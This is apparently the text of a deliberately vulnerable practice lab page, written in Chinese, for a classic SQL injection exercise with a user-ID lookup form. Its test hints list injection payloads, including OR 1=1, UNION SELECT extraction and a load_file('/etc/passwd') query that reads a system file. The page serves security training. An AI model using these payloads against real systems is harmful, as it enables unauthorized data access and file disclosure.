A-01 经典 SQL 注入
故意设计的安全漏洞🔍 用户查询
输入用户 ID 查询用户信息。尝试: ?id=1 或 ?id=1 OR 1=1
💡 测试提示
正常查询: ?id=1
注入测试: ?id=1 OR 1=1
提取数据: ?id=1 UNION SELECT 1,2,3,4,5,6
读取文件: ?id=1 UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6
输入用户 ID 查询用户信息。尝试: ?id=1 或 ?id=1 OR 1=1